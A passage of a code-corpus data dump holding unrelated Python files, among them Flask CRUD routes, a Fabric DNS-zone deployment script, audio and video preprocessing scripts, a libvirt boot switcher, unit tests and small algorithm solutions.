= ProsedurLaporMedcen.query.filter_by(id=id).first()\n# if request.method == 'POST':\n# if current_user.username == 'polsek':\n# data.kodePolsek = request.form['kodePolsek']\n# data.ProsedurLaporPolsek = request.files['laporPolsek']\n# db.session.commit()\n# return redirect(url_for('prosedur'))\n# if current_user.username == 'medcen':\n# data2.kodePolsek = request.form['kodePolsek']\n# data2.ProsedurLaporMedcen = request.files['laporMedcen']\n# db.session.commit()\n# return redirect(url_for('prosedur'))\n# else:\n# return render_template('prosedur/prosedurAdd.html', title='Ubah Prosedur', submenu='dataProsedur' ,link1='Data Prosedur', link2='Ubah Data Prosedur', link3='prosedur/', data=data, dataPolsek=Polsek.query.all())\n\n@app.route('/prosedur//hapus/', methods=['GET','POST'])\n@login_required\ndef prosedurDel(id):\n if current_user.username == 'polsek':\n data = ProsedurLaporPolsek.query.filter_by(id=id).first()\n db.session.delete(data)\n db.session.commit()\n return redirect(url_for('prosedur'))\n if current_user.username == 'medcen':\n data2 = ProsedurLaporMedcen.query.filter_by(id=id).first()\n db.session.delete(data2)\n db.session.commit()\n return redirect(url_for('prosedur'))\n\n# # Akhir Polsek\n\n\n# Awal NomorLayanan\n\n@app.route('/nomor_layanan/')\n@login_required\ndef layanan():\n return render_template('layanan/layanan.html', title='Nomor Layanan', submenu='dataNomor Layanan', link1='Data Nomor Layanan' ,data=NomorLayananPolsek.query.all(), data2=NomorLayananMedcen.query.all())\n\n@app.route('/nomor_layanan/tambah/', methods=['GET','POST'])\n@login_required\ndef layananAdd():\n if request.method == 'POST':\n kodePolsek = request.form['kodePolsek']\n if current_user.username == 'polsek':\n layananPolsek = request.form['layananPolsek']\n daruratPolsek = request.form['daruratPolsek']\n data = NomorLayananPolsek(kodePolsek=kodePolsek, NomorLayananPolsek=layananPolsek, NomorDaruratPolsek=daruratPolsek)\n db.session.add(data)\n db.session.commit()\n return redirect(url_for('layanan'))\n if current_user.username == 'medcen':\n layananMedcen = request.form['layananMedcen']\n data2 = NomorLayananMedcen(kodePolsek=kodePolsek, NomorLayananMedcen=layananMedcen)\n db.session.add(data2)\n db.session.commit()\n return redirect(url_for('layanan'))\n else:\n return render_template('layanan/layananAdd.html', title='Tambah Nomor Layanan', submenu='dataNomor Layanan' ,link1='Data Nomor Layanan', link2='Tambah Data Nomor Layanan', link3='nomor_layanan/', dataPolsek=Polsek.query.all())\n\n@app.route('/nomor_layanan//ubah/', methods=['GET','POST'])\n@login_required\ndef layananEdit(id):\n data = NomorLayananPolsek.query.filter_by(id=id).first()\n data2 = NomorLayananMedcen.query.filter_by(id=id).first()\n if request.method == 'POST':\n if current_user.username == 'polsek':\n data.kodePolsek = request.form['kodePolsek']\n data.NomorLayananPolsek = request.form['layananPolsek']\n data.NomorDaruratPolsek = request.form['daruratPolsek']\n db.session.commit()\n return redirect(url_for('layanan'))\n if current_user.username == 'medcen':\n data2.kodePolsek = request.form['kodePolsek']\n data2.NomorLayananMedcen = request.form['layananMedcen']\n db.session.commit()\n return redirect(url_for('layanan'))\n else:\n return render_template('layanan/layananAdd.html', title='Ubah Nomor Layanan', submenu='dataNomor Layanan' ,link1='Data Nomor Layanan', link2='Ubah Data Nomor Layanan', link3='nomor_layanan/',data2=data2, data=data, dataPolsek=Polsek.query.all())\n\n@app.route('/nomor_layanan//hapus/', methods=['GET','POST'])\n@login_required\ndef layananDel(id):\n if current_user.username == 'polsek':\n data = NomorLayananPolsek.query.filter_by(id=id).first()\n db.session.delete(data)\n db.session.commit()\n return redirect(url_for('layanan'))\n elif current_user.username == 'medcen':\n data2 = NomorLayananMedcen.query.filter_by(id=id).first()\n db.session.delete(data2)\n db.session.commit()\n return redirect(url_for('layanan')) \n\n# Akhir NomorLayanan\n\n\n# Awal WebsiteResmi\n\n@app.route('/website_resmi/')\n@login_required\ndef webresmi():\n return render_template('webresmi/webresmi.html', title='Website Resmi', submenu='dataWebsite Resmi', link1='Data Website Resmi' ,data=WebsiteResmiPolsek.query.all(), data2=WebsiteResmiMedcen.query.all())\n\n@app.route('/website_resmi/tambah/', methods=['GET','POST'])\n@login_required\ndef webresmiAdd():\n if request.method == 'POST':\n kodePolsek = request.form['kodePolsek']\n if current_user.username == 'polsek':\n webPolsek = request.form['webPolsek']\n data = WebsiteResmiPolsek(kodePolsek=kodePolsek, WebsiteResmiPolsek=webPolsek)\n db.session.add(data)\n db.session.commit()\n return redirect(url_for('webresmi'))\n if current_user.username == 'medcen':\n webMedcen = request.form['webMedcen']\n data2 = WebsiteResmiMedcen(kodePolsek=kodePolsek, WebsiteResmiMedcen=webMedcen)\n db.session.add(data2)\n db.session.commit()\n return redirect(url_for('webresmi'))\n else:\n return render_template('webresmi/webresmiAdd.html', title='Tambah Website Resmi', submenu='dataWebsite Resmi' ,link1='Data Website Resmi', link2='Tambah Data Website Resmi', link3='website_resmi/', dataPolsek=Polsek.query.all())\n\n@app.route('/website_resmi//ubah/', methods=['GET','POST'])\n@login_required\ndef webresmiEdit(id):\n data = WebsiteResmiPolsek.query.filter_by(id=id).first()\n data2 = WebsiteResmiMedcen.query.filter_by(id=id).first()\n if request.method == 'POST':\n if current_user.username == 'polsek':\n data.kodePolsek = request.form['kodePolsek']\n data.WebsiteResmiPolsek = request.form['webPolsek']\n db.session.commit()\n return redirect(url_for('webresmi'))\n if current_user.username == 'medcen':\n data2.kodePolsek = request.form['kodePolsek']\n data2.WebsiteResmiMedcen = request.form['webMedcen']\n db.session.commit()\n return redirect(url_for('webresmi'))\n else:\n return render_template('webresmi/webresmiAdd.html', title='Ubah Website Resmi', submenu='dataWebsite Resmi' ,link1='Data Website Resmi', link2='Ubah Data Website Resmi', link3='website_resmi/',data2=data2, data=data, dataPolsek=Polsek.query.all())\n\n@app.route('/website_resmi//hapus/', methods=['GET','POST'])\n@login_required\ndef webresmiDel(id):\n if current_user.username == 'polsek':\n data = WebsiteResmiPolsek.query.filter_by(id=id).first()\n db.session.delete(data)\n db.session.commit()\n return redirect(url_for('webresmi'))\n elif current_user.username == 'medcen':\n data2 = WebsiteResmiMedcen.query.filter_by(id=id).first()\n db.session.delete(data2)\n db.session.commit()\n return redirect(url_for('webresmi')) \n\n# Akhir WebsiteResmi\n\n\n\n\n\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":17672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"232484475","text":"class Solution(object):\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if s == \"\":\n return 0\n maxLength = 1\n unique = set()\n unique.add(s[0])\n start, end = 0, 1\n while start < len(s) and end < len(s):\n if s[end] in unique:\n unique.remove(s[start])\n start += 1\n else:\n unique.add(s[end])\n end += 1\n maxLength = max(maxLength, end - start)\n\n return maxLength\n","sub_path":"leetcode/strings/3.longestsubstringwithoutrepeat.py","file_name":"3.longestsubstringwithoutrepeat.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"543426223","text":"import scipy\nimport numpy as np\nfrom scipy.io import wavfile\nimport scipy.signal\nimport os\nfrom scipy.interpolate import interp1d\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import plot,show,hold,grid\nimport pickle \n\nnp.set_printoptions(threshold=np.inf)\n\n#note: this path needs to be changed to run elsewhere\npath_A_murmur = \"/Users/chantal/Desktop/Heartbeat_Classif/CSC2515_Project/data/Atraining_murmur/\"\npath_A_normal = \"/Users/chantal/Desktop/Heartbeat_Classif/CSC2515_Project/data/Atraining_normal/\"\npath_A_test = \"/Users/chantal/Desktop/Heartbeat_Classif/CSC2515_Project/data/Aunlabelledtest/\"\npath_B_murmur = \"/Users/chantal/Desktop/Heartbeat_Classif/CSC2515_Project/data/Btraining_murmur/\"\npath_B_normal = \"/Users/chantal/Desktop/Heartbeat_Classif/CSC2515_Project/data/Btraining_normal/\"\npath_B_test = \"/Users/chantal/Desktop/Heartbeat_Classif/CSC2515_Project/data/Bunlabelledtest/\"\n\n'''\n1) Read files and convert to vectors\n2) Decimate signal, then apply chebyshev type 1 lowpass filter\n3) Normalize signal to absolute maximum\n'''\n\n\n############ 1) Importing .wav files and collecting translated arrays ############\n\n# labelled training data = murmur/normal, unlabelled data is testing \ntraining_data = []\ntest_data = [] \n\ndata_A_murmur = []\ndata_A_normal = []\ndata_A_test = []\n\ndata_B_murmur = []\ndata_B_normal = []\ndata_B_test = []\n\n# For each differently labelled heartbeat (ie. normal, murmur, etc.), read in files and convert to arrays \n\n# dataset A, murmur \nitems_1 = os.listdir(path_A_murmur)\nfor i in items_1:\n\tif i.endswith(\".wav\"):\n\t#reading wav files, returns tuple of sampling rate and then an array --> we just want the array, not sampling rate\n\t\tsr, arr = scipy.io.wavfile.read(path_A_murmur+i)\n\t\tdata_A_murmur.append(arr)\n\n# dataset A, normal\nitems_2 = os.listdir(path_A_normal)\nfor j in items_2:\n\tif j.endswith(\".wav\"):\n\t\tsr, arr = scipy.io.wavfile.read(path_A_normal+j)\n\t\tdata_A_normal.append(arr)\n\n# dataset A, unlabelled\nitems_3 = os.listdir(path_A_test)\nfor k in items_3:\n\tif k.endswith(\".wav\"):\n\t\tsr, arr = scipy.io.wavfile.read(path_A_test+k)\n\t\tdata_A_test.append(arr)\n\n# dataset B, murmur \nitems_4 = os.listdir(path_B_murmur)\nfor l in items_4:\n\tif l.endswith(\".wav\"):\n\t\tsr, arr = scipy.io.wavfile.read(path_B_murmur+l)\n\t\tdata_B_murmur.append(arr)\n\n# dataset B , normal\nitems_5 = os.listdir(path_B_normal)\nfor m in items_5:\n\tif m.endswith(\".wav\"):\n\t\tsr, arr = scipy.io.wavfile.read(path_B_normal+m)\n\t\tdata_B_normal.append(arr)\n\n# dataset B, unlabelled\nitems_6 = os.listdir(path_B_test)\nfor n in items_6:\n\tif n.endswith(\".wav\"):\n\t\tsr, arr = scipy.io.wavfile.read(path_B_test+n)\n\t\tdata_B_test.append(arr)\n\n\n############ 2) Decimating signal and adding Chebyshev I Filter ############\n\n#following filtering method of (Gomes & Pereira, 2012)\nsig_train = []\nsig_test = []\n#creating chebysev filter\nb, a = scipy.signal.cheby1(5, 5, 0.5, btype='low', output='ba')\n\n#decimating and applying filter\n\nfor s in data_A_murmur:\n\tdec_sig = scipy.signal.decimate(s, 5)\n\tsig_train.append(scipy.signal.filtfilt(b, a, dec_sig))\n\nfor s in data_A_normal:\n\tdec_sig = scipy.signal.decimate(s, 5)\n\tsig_train.append(scipy.signal.filtfilt(b, a, dec_sig))\n\nfor s in data_A_test:\n\tdec_sig = scipy.signal.decimate(s, 5)\n\tsig_test.append(scipy.signal.filtfilt(b, a, dec_sig))\n\nfor s in data_B_murmur:\n\tdec_sig = scipy.signal.decimate(s, 5)\n\tsig_train.append(scipy.signal.filtfilt(b, a, dec_sig))\n\nfor s in data_B_normal:\n\tdec_sig = scipy.signal.decimate(s, 5)\n\tsig_train.append(scipy.signal.filtfilt(b, a, dec_sig))\n\nfor s in data_B_test:\n\tdec_sig = scipy.signal.decimate(s, 5)\n\tsig_test.append(scipy.signal.filtfilt(b, a, dec_sig))\n\n\n############ 3) Normalize each signal ############\n# NOTE: sig_test and sig_train is a list of ndarrays (which vary in length based on time of recording)\nfor x in range(len(sig_train)):\n\tsig_train[x] = (sig_train[x]-sig_train[x].min())/(sig_train[x].max()-sig_train[x].min())\n\nfor y in range(len(sig_test)):\n\tsig_test[y] = (sig_test[y]-sig_test[y].min())/(sig_test[y].max()-sig_test[y].min())\n\n\nprint(len(sig_train))\nprint(len(sig_test))\n\npickle_out1 = open(\"training_data.p\", \"wb\")\npickle_out2 = open(\"testing_data.p\", \"wb\")\n\npickle.dump(sig_train, pickle_out1)\npickle.dump(sig_test, pickle_out2)\n\npickle_out1.close()\npickle_out2.close()\n","sub_path":"source/data_preproc.py","file_name":"data_preproc.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"411373204","text":"#!/usr/bin/env python2.7\n\nimport sys\nimport os\nimport jinja2\n\nfrom fabric.api import *\nfrom fabric.tasks import execute\nimport getpass\n\ntemplateLoader = jinja2.FileSystemLoader( searchpath=\"/\" )\ntemplateEnv = jinja2.Environment( loader=templateLoader )\nTEMPMZFILE = os.getcwd()+'/jinja2temps/fmnewzone.conf'\nTEMPSZFILE = os.getcwd()+'/jinja2temps/fsnewzone.conf'\nTEMPDOMFILE = os.getcwd()+'/jinja2temps/mszone.conf'\n\ntempmz = templateEnv.get_template( TEMPMZFILE )\ntempsz = templateEnv.get_template( TEMPSZFILE )\ntempdom = templateEnv.get_template( TEMPDOMFILE )\n\nenv.roledefs = {\n 'dns': [str(raw_input('Please enter NS1 IP address: ')), str(raw_input('Please enter NS2 IP address: '))]\n}\n\nenv.user = raw_input('Please enter username for UNIX/Linux server: ')\nenv.password = getpass.getpass()\n\nprint('1. Please write domain name and click Enter button.')\nprint('2. For exit, write 2 and click Enter button: ')\nent = raw_input('Write your choose: ')\n\ncbconf = '/etc/named.conf'\ncbindpath = '/etc/namedb'\nfbconf = '/usr/local/etc/namedb/named.conf'\nfbindpath = '/usr/local/etc/namedb'\ndef domainchecker(conf):\n if server == env.roledefs['dns'][0]:\n fzonename = run('cat '+conf+' | grep '+ent+' | head -1 | awk \\'{ print $2 }\\' | sed \\'s/\"//g\\'')\n fzonefile = run('cat '+conf+' | grep '+ent+' | tail -1 | awk \\'{ print $2 }\\' | sed \\'s/\"//g;s/;//g\\' | awk -F/ \\'{print $NF}\\' | cut -f1,2 -d\\'.\\'')\n if ent == fzonename and fzonefile == ent:\n print(' Entered domain name '+ent+' already exists on the NS1 '+env.roledefs['dns'][0]+' server!!!')\n print(' If you want add new record for this '+ent+' domain name, please use ./python-add-record.py script.')\n sys.exit()\n else:\n pass\n\ndef writemzone(bindpath, conf):\n tempmzVars = { \"ns1\" : env.roledefs['dns'][0], \"ns2\" : env.roledefs['dns'][1], \"domain\" : ent, \"bdpath\" : bindpath }\n outputmzText = tempmz.render( tempmzVars )\n outputdomText = tempdom.render( tempmzVars )\n if server == env.roledefs['dns'][0]:\n with open(\"zone_\"+env.roledefs['dns'][0]+\".conf\", \"wb\") as ns1zone:\n ns1zone.write(outputmzText)\n with open(ent+\".zone\", \"wb\") as masdom:\n masdom.write(outputdomText)\n print(\"This is NS1 \"+env.roledefs['dns'][0]+\" server\")\n put('zone_'+env.roledefs['dns'][0]+'.conf', ''+bindpath+'')\n put(ent+'.zone', ''+bindpath+'/master/')\n run('cat '+bindpath+'/zone_'+env.roledefs['dns'][0]+'.conf >> '+conf+'')\n run('service named restart')\n\ndef writeszone(bindpath, conf):\n tempszVars = { \"ns1\" : env.roledefs['dns'][0], \"domain\" : ent, \"bdpath\" : bindpath}\n outputszText = tempsz.render( tempszVars )\n if server == env.roledefs['dns'][1]:\n with open(\"zone_\"+env.roledefs['dns'][1]+\".conf\", \"wb\") as ns2zone:\n ns2zone.write(outputszText)\n print(\"This is NS2 \"+env.roledefs['dns'][1]+\" server\")\n put('zone_'+env.roledefs['dns'][1]+'.conf', ''+bindpath+'')\n #print(\"File copied to NS2 -> \"+env.roledefs['dns'][1]+\" server\")\n run('cat '+bindpath+'/zone_'+env.roledefs['dns'][1]+'.conf >> '+conf+'')\n run('service named restart')\n\ndef checkservice():\n print(' DNS service is not working!!!')\n print(' To install DNS bind please use, ./python-ms-sl-dns.py script. ')\n sys.exit()\n\nfor server in env.roledefs['dns']:\n env.host_string = server\n with settings(\n hide('warnings', 'running', 'stdout', 'stderr'),\n warn_only=True\n ):\n osver = run('uname -s')\n lintype = run('cat /etc/redhat-release | awk \\'{ print $1 }\\'')\n ftype = run('uname -v | awk \\'{ print $2 }\\' | cut -f1 -d \\'.\\'')\n if osver == 'FreeBSD' and ftype >= 10:\n getfbindpack = run('which named')\n bindfpidfile = run('cat /var/run/named/pid')\n bindfpid = run('ps waux | grep named | grep -v grep | awk \\'{ print $2 }\\'')\n if getfbindpack == '/usr/local/sbin/named' and bindfpid == bindfpidfile:\n domainchecker(fbconf)\n\n if ent != 2 and len(ent) > 4:\n writemzone(fbindpath, fbconf)\n writeszone(fbindpath, fbconf)\n else:\n print(\"\\nMinimal symbol count must be 4.\")\n sys.exit()\n else:\n checkservice()\n\n elif osver == 'Linux' and lintype == 'CentOS':\n getlbindpack = run('which named')\n bindlpidfile = run('cat /var/run/named/named.pid')\n bindlpid = run('ps waux|grep named | grep -v grep | awk \\'{ print $2 }\\'')\n if getlbindpack == '/usr/sbin/named' and bindlpidfile == bindlpid:\n domainchecker(cbconf)\n if ent != 2 and len(ent) > 4:\n writemzone(cbindpath, cbconf)\n writeszone(cbindpath, cbconf)\n else:\n print(\"\\nMinimal symbol count must be 4.\")\n sys.exit()\n else:\n checkservice()\n else:\n print(\"The script is not determine server type. For this reason you cannot use this script.\")\n","sub_path":"python-add-zone.py","file_name":"python-add-zone.py","file_ext":"py","file_size_in_byte":5177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"389333586","text":"#!/usr/bin/env python\n#\n# Copyright 2016 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\"\"\"Munki catalogs module tests.\"\"\"\n\nimport logging\n\nfrom google.apputils import app\nfrom tests.simian.mac.common import test\nfrom simian.mac.munki.handlers import catalogs\n\n\nclass CatalogsHandlersTest(test.RequestHandlerTest):\n\n def GetTestClassInstance(self):\n return catalogs.Catalogs()\n\n def GetTestClassModule(self):\n return catalogs\n\n def testGetSuccess(self):\n \"\"\"Tests Catalogs.get().\"\"\"\n name = 'goodname'\n self.MockDoAnyAuth()\n catalog = self.MockModelStatic(\n 'Catalog', 'MemcacheWrappedGet', name, 'plist_xml')\n self.response.headers['Content-Type'] = 'text/xml; charset=utf-8'\n self.response.out.write(catalog).AndReturn(None)\n\n self.mox.ReplayAll()\n self.c.get(name)\n self.mox.VerifyAll()\n\n def testGet404(self):\n \"\"\"Tests Catalogs.get() where name is not found.\"\"\"\n name = 'badname'\n self.MockDoAnyAuth()\n self.MockModelStaticBase(\n 'Catalog', 'MemcacheWrappedGet', name, 'plist_xml').AndReturn(None)\n self.response.set_status(404).AndReturn(None)\n\n self.mox.ReplayAll()\n self.c.get(name)\n self.mox.VerifyAll()\n\n\nlogging.basicConfig(filename='/dev/null')\n\n\ndef main(unused_argv):\n test.main(unused_argv)\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"src/tests/simian/mac/munki/handlers/catalogs_test.py","file_name":"catalogs_test.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"124490937","text":"# consider the rotate case\n# total 26 chars\nimport collections\nclass Solution(object):\n def groupStrings(self, strings):\n \"\"\"\n :type strings: List[str]\n :rtype: List[List[str]]\n \"\"\"\n offsets = collections.defaultdict(list)\n for s in strings:\n if len(s) == 1:\n offsets['single'].append(s)\n else:\n offset = []\n for i in range(1, len(s)):\n \n offset.append((ord(s[i]) - ord(s[i-1])) % 26)\n offset = tuple(offset)\n offsets[offset].append(s)\n return offsets.values()\n \n \n \n","sub_path":"group-shifted-strings/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"7347396","text":"import cv2\r\nimport os\r\nfrom multiprocessing import Pool\r\nimport sys\r\n\r\ndirectory = sys.argv[1]\r\nos.mkdir(directory+\"../frames\")\r\ndef mk_frames(vid):\r\n print(vid)\r\n if(vid[-3:] != \"avi\"):\r\n return\r\n global directory\r\n os.mkdir(directory+'../frames/'+vid[:-4])\r\n\r\n cap = cv2.VideoCapture(directory+\"/\"+vid)\r\n i = 0\r\n ret = True\r\n while(cap.isOpened()):\r\n ret, frame = cap.read()\r\n if ret == False:\r\n break\r\n cv2.imwrite(directory+'../frames'+'/'+vid[:-4]+'/'+str(i)+'.jpg',frame)\r\n i+=1\r\n\r\n cap.release()\r\n cv2.destroyAllWindows()\r\n os.remove(directory+\"/\"+vid)\r\n\r\np = Pool(int(sys.argv[2]))\r\nfile_list = os.listdir(directory)\r\np.map(mk_frames,file_list)\r\n","sub_path":"save_frames.py","file_name":"save_frames.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"88059894","text":"# the variable \"args\" is already defined\nfrom typing import List\n\nmy_list = [] # your code here\nimport sys\n# arg = sys.argv\narg = args\nfor i in range(len(arg) - 1):\n my_list.append(int(arg[i+1]))\nprint(my_list)\n\n# further code of the script \"process_four_numbers.py\"","sub_path":"Problems/Types/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"199644538","text":"#!/usr/bin/env python\n\nimport argparse\nimport xml.etree.ElementTree as ET\n\nimport libvirt\n\nDOMAIN = 'ramdisk'\n\nKERNEL = '/home/pshchelo/images/tinyipa/latest/tinyipa-master.vmlinuz'\nINITRAMFS = '/home/pshchelo/images/tinyipa/latest/ansible-tinyipa-master.gz'\nKERNEL_OPTS = ' '.join(['ipa-standalone=1',\n 'nofb nomodeset',\n 'vga=normal',\n 'console=ttyS0',\n 'systemd.journald.forward_to_console=yes'])\n\n\ndef restart_to_kernel(domain, kernel, initrd):\n domain.destroy()\n xml = ET.fromstring(domain.XMLDesc())\n os = xml.find('os')\n kernel_el = ET.SubElement(os, 'kernel')\n kernel_el.text = kernel\n initrd_el = ET.SubElement(os, 'initrd')\n initrd_el.text = initrd\n cmdline_el = ET.SubElement(os, 'cmdline')\n cmdline_el.text = KERNEL_OPTS\n conn.createXML(ET.tostring(xml))\n\n\ndef restart_to_hdd(domain):\n domain.destroy()\n xml = ET.fromstring(domain.XMLDesc())\n os = xml.find('os')\n for el_name in ('kernel', 'initrd', 'cmdline'):\n el = ET.SubElement(os, el_name)\n os.remove(el)\n kernel_el = ET.SubElement(os, 'kernel')\n os.remove(kernel_el)\n initrd_el = ET.SubElement(os, 'initrd')\n os.remove(initrd_el)\n cmdline_el = ET.SubElement(os, 'cmdline')\n os.remove(cmdline_el)\n conn.createXML(ET.tostring(xml))\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('target', type=str, choices=['direct', 'hdd'],\n help='Set boot mode and restart.')\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = parse_args()\n conn = libvirt.open()\n domain = conn.lookupByName(DOMAIN)\n if args.target == 'direct':\n restart_to_kernel(domain, KERNEL, INITRAMFS)\n elif args.target == 'hdd':\n restart_to_hdd(domain)\n conn.close()\n","sub_path":"scripts/ramdisk-mgmt.py","file_name":"ramdisk-mgmt.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"124178606","text":"import configparser\nimport os\nimport json\nfrom .messages import *\nfrom uuid import *\n#PATH PARA CONECTAR ALA BASE DE DATOS ESTA ESPERANDO UN ARCHIVO .INI\nDEBUGAPP=False\n\nDB_PATH=\"\"\n\nclass ERROR:\n \"\"\"Clase para capturar los errores\"\"\"\n def __init__(self,err=False,msgg=\"\"):\n self.err = err\n self.msgg = msgg\n \n def InitialERR(self):\n \"\"\"Inicializa las variables errores\"\"\"\n self.err=False\n self.msgg=''\n\n def InputMsggErr(self,key=\"\", msgg=\"\"):\n \"\"\"Ingresa un mensaje ala variable ERROR\"\"\"\n self.err=True\n if key==None or key.strip()==\"\":\n self.msgg= msgg\n else:\n self.msgg = OuputMsgg(key)\n \n def OuputMsggErr(self):\n \"\"\"Muestra el mensaje ala variable ERROR\"\"\"\n if DEBUGAPP:\n print('ERROR:{}'.format(self.msgg))\n\n return 'ERROR:{}'.format(self.msgg)\n \n @staticmethod\n def MsggErr( key=\"\", msgg=\"\"):\n \"\"\"Ingresa un mensaje ala variable ERROR y devuelve una variable error instanciada\"\"\"\n ERR =ERROR()\n ERR.err = True\n if key == None or key.strip() == \"\":\n ERR.msgg = msgg\n else:\n ERR.msgg = OuputMsgg(key)\n \n return ERR\n\n\ndef DebugAdd(opc=False):\n \"\"\"Agrega el modo debug ala aplicacion\n true -> activar\n false -> desactivar\n \"\"\"\n global DEBUGAPP \n DEBUGAPP = opc\n \n\ndef PathDBInput(path):\n \"\"\"Ingresa el path de configuracion\"\"\"\n global DB_PATH \n DB_PATH = path\n\n\ndef PathDBOuput():\n \"\"\"Regresa el path de configuracion\"\"\"\n global DB_PATH\n return DB_PATH\n\n\n\n\ndef ParseConfig(PATH):\n \"\"\"Parsea las configuraciones de la base de datos\n return dict conexion:\n [DATABASE]\n Database = example\n Host = example\n Port = example\n User = example\n Pass = example\n \"\"\"\n dictconfig={\n 'Database':\"\",\n 'Host':\"\",\n 'Port':\"\",\n 'User':\"\",\n 'Pass':\"\",\n 'TipDB':\"\",\n }\n err =ERROR()\n err = _ExistF(PATH)\n if err.err:\n return err,None\n\n config = configparser.ConfigParser()\n config.sections()\n try:\n config.read(PATH)\n except:\n err.InputMsggErr('ERRPARSE')\n return err,None\n \n try:\n topsecret = config['DATABASE']\n dictconfig['Database'] = str(topsecret['Database'])\n dictconfig['Host'] = str(topsecret['Host'])\n dictconfig['Port'] = str(topsecret['Port'])\n dictconfig['User'] = str(topsecret['User'])\n dictconfig['Pass'] = str(topsecret['Pass'])\n dictconfig['TipDB'] = str(topsecret['TipDB'])\n return err, dictconfig\n except:\n err.InputMsggErr('ERRPARSE2')\n return err,None\n \n \n\n#archivos\ndef _ExistF(path):\n \"\"\"Verifica si existe el archivo\"\"\"\n if os.path.exists(path):\n return ERROR()\n else:\n return ERROR.MsggErr('NotParse')\n\n \n\ndef OutJson(data):\n \"\"\"Envia una data en json tranformandola primero en diccionario\"\"\"\n\n try:\n dics=dict(data)\n out=json.dumps(data,ensure_ascii=False)\n return ERROR(),out\n except:\n return ERROR.MsggErr('ERRJSON'),None\n \n\ndef uniqid():\n \"\"\"Genera un secuencial unique\"\"\"\n from time import time\n return int(str(uuid4().int)[0:8])\n\n","sub_path":"DataPythonEtl/EtlPy/utl/utl.py","file_name":"utl.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"85050022","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 21 09:09:38 2019\n\n@author: lenovo\n\"\"\"\n\n#/usr/bin/python3\n# -*- coding: utf-8 -*-\n# author = chenzixuan\nimport math\nimport time\nimport matplotlib.pyplot as plt\nimport matplotlib as mat\nimport numpy as np\nimport pandas as pd\nfrom gurobipy import *\nfrom math import sin, asin, cos, radians, fabs, sqrt\nfrom scipy.optimize import leastsq\nfrom xlrd import *\n#workbook=open_workbook(\"sheet1.xlsx\")\n#worksheet=workbook.sheet_by_index(0)\n#data=[]\n#for i in range(2,worksheet.nrows): #循环打印每一行\n# data.append(np.array(worksheet.row_values(i)))\n\n#data=np.array(data)\nTHETA=20\nALPHA=[20,10]\nBETA=[15,20]\nEPSIL=0.001\nLENGTH=data.shape[0]\n\nw=[0.5,0.5,0.4]\nOptimal=[109342.28180310303,13.0,4.0]\n\nc=data[:,3]\nt=data[:,4]\nd=np.ones((LENGTH,LENGTH))\nfor i in range(0,LENGTH):\n for j in range(0,LENGTH):\n d[i,j]=np.sqrt((data[i,1]-data[j,1])**2+(data[i,2]-data[j,2])**2+(data[i,0]-data[j,0])**2)\n if(i==j):\n d[i,j]=float(10000000)\n\n\n#x->point\ndef xRoute(x1):\n last=np.array(x1)\n cons=last.reshape(LENGTH+4,LENGTH)[0:LENGTH,:]\n points_tuple=np.where(cons==1)\n points=[]\n pointsNum=len(points_tuple[0])\n for i in range(pointsNum):\n points.append([points_tuple[0][i],points_tuple[1][i]])\n for i in range(pointsNum-1):\n for j in range(1,pointsNum):\n if points[j][0]==points[i][1]:\n t=points[j]\n points[j]=points[i+1]\n points[i+1]=t\n return(points)\n\n#Search Circle\ndef Next_Point(Oi, Oj, vi, r):\n Oij=Oj-Oi\n Lij=np.linalg.norm(Oij)\n a=np.cross(vi,Oij)\n n=a/np.linalg.norm(a)\n psi=math.acos(np.inner(vi,Oij)/(np.linalg.norm(vi)*Lij))\n d_line=Lij-2*r*math.sin(psi)\n d_arc=2*r*psi\n d=d_line+d_arc\n vj=math.cos(2*psi)*vi+(1-math.cos(2*psi))*np.inner(vi,n)*n+math.sin(2*psi)*np.cross(n,vi)\n\n return (d,vj)\n\ndef For_ZX(traj, delta=EPSIL, alpha1=ALPHA[0], alpha2=ALPHA[1], beta1=BETA[0], beta2=BETA[1], theta=THETA, r=200):\n\n # 主函数\n # 返回值: True=可到达终点 False=炸\n\n traj=np.array(traj)\n nn=traj.shape[0]\n d=0\n V=0 #垂直\n L=0 #水平\n\n for n in range(0,nn):\n nOi=traj[n][0]\n nOj=traj[n][1]\n Oi=np.array([data[nOi,0],data[nOi,1],data[nOi,2]])\n Oj=np.array([data[nOj,0],data[nOj,1],data[nOj,2]])\n if n==0:\n v=Oj-Oi\n 